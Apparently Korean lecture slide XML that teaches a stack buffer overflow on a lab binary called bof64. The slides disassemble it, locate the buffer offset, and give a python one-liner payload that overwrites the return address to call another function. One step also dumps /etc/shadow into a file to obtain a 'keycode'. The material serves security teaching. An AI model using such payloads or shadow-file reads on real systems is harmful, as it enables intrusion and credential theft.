                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D58818-0FB8-42B4-AB48-3554D67017F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="535313" y="3047806"/>
            <a:ext cx="4989449" cy="2810764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A528125-FF0A-4A9C-A648-6C05C1C3906E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="-1" r="367" b="56894"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318251" y="899528"/>
            <a:ext cx="2997200" cy="880285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539A5F22-DB43-4D03-88B5-651588C39286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915758689"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6301370" y="2457302"/>
          <a:ext cx="4932807" cy="3703407"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="236843578"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="287805">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84635548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3304629">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985868"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38913" name="_x564967160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12EBF08F-9CBE-4E11-BC20-9429D8012D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8630" y="3075572"/>
            <a:ext cx="3552825" cy="288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0463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objdump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bof64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취약점이 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수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solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>버퍼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>의 시작 주소가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16(0x10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 확인</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54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A14AF77C-BB85-48EE-A741-3945FDC05F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="936036"/>
            <a:ext cx="5014341" cy="2785745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E368D99-6D3F-4489-A11B-6A622DFC0473}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="155" b="35736"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497975" y="4108245"/>
            <a:ext cx="4947604" cy="2063955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07E60104-4003-4ECA-892D-8CA49033ECAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25506375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6321475" y="461749"/>
          <a:ext cx="5340017" cy="5891961"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5340017">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848009183"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="223301">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137873759"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="565860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진입한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아래와 같이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복귀할 때 사용되는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1848564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058" name="_x564918704">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DB62A56-5106-4732-A942-17A4F364EB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691" y="3862882"/>
            <a:ext cx="3070601" cy="2490828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45057" name="_x564938504">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8D06182-F8BD-488A-BBDC-63F3AD814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931" r="131"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6528131" y="993564"/>
            <a:ext cx="3109161" cy="2376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1444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스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 취약점을 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./bof64 $(python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주소는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>0x0000000000400635</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이나</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>인텔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>x64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>아키텍처는 리틀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>엔디언</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(little endian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 사용하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>복귀 주소에 역으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 0x3506400000000000) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력한다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70331"/>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7" name="Picture 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8979F9E7-D4D4-4823-98DC-C11837B3C20C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505278" y="842130"/>
            <a:ext cx="4945761" cy="2744597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87EB1C4-726B-4F6C-863A-6B565A966529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1210289945"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="518232" y="4172331"/>
          <a:ext cx="4932807" cy="1711135"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="136858131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6749492"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="140817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외의 사용자는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8783995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="_x564965576">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD50D22F-5C9F-4AB1-991A-AE7A350AC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65" y="4726843"/>
            <a:ext cx="45942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_x564966080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89101173-22A0-4202-A176-F2AD9B34D6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65" y="5242131"/>
            <a:ext cx="3413125" cy="5635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6ED209E0-61F7-41D0-8AA4-527392A4E355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755197" y="42762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8" name="표 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F02A76-5DC1-47DA-9569-0C049FE31AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3145730245"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6278110" y="434292"/>
          <a:ext cx="4932807" cy="3906393"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="61157822"/>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76049629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="35999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경우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종료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0x0000000000400635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번지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함수의 시작 주소</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복귀한다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931332"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="_x564893288">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAF4901-2586-4E1D-9D27-DAC7A263B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4716" y="1079106"/>
            <a:ext cx="3297023" cy="267533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FCA5A70-20C7-4B00-9BF3-CC1B3F3C63F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4543284"/>
            <a:ext cx="5616792" cy="1945715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>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재실행 및 출력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>리다이렉션으로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>내용을 파일에 출력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./bof64 $(python -c 'print "A"*24+"\x35\x06\x40") &gt;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acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>및 파일명을 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 획득</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dirty="0"/>
              <a:t>    파일명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173B945A-D41B-48A0-A7DB-8F01DC99CABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272473" y="5036948"/>
            <a:ext cx="5408912" cy="359554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58970142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11A4485-4317-4F31-A74B-0E009D382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 </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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A091AA-30F6-4270-8E55-4E599BAF0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8CA05AE-7C1C-425E-A911-D5525EA28A2E}"/>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19" name="타원 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B415383-2E2E-4BCE-85C7-5B35E10E2B32}"/>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64E1F945-D42A-4F25-B58D-E50A41EB32B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A443AC1F-F004-4379-9D4E-3A82ABE029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82F75C4-5F19-47F6-8EB1-6AAF8693BF3C}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="127721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직사각형 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3411BAE-D387-4D60-A2F8-C24262A209F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7559610" y="4207925"/>
            <a:ext cx="1890406" cy="1263553"/>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 name="직사각형 210">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EA86D8-4E55-469F-B74D-2A3082EBA5F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673665" y="2342463"/>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0" name="직사각형 209">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB967AA-AAF0-4365-BF5F-F91566841302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632490" y="2376580"/>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 name="직사각형 208">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A54C0A-CDBD-47DD-866E-FEBC1C5F7AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3591315" y="2418224"/>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9" name="직사각형 1048">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C42F1D1-A526-49D4-A3E1-CBEAC297DFD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3545409" y="2457686"/>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199" y="400374"/>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kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>비대면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 수업</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격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1870B9A7-67FB-4633-B16B-4C6121042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 name="Picture 2" descr="격리 데스크탑 PC 벡터 로열티 무료 사진, 그림, 이미지 그리고 스톡포토그래피. Image 12839846.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
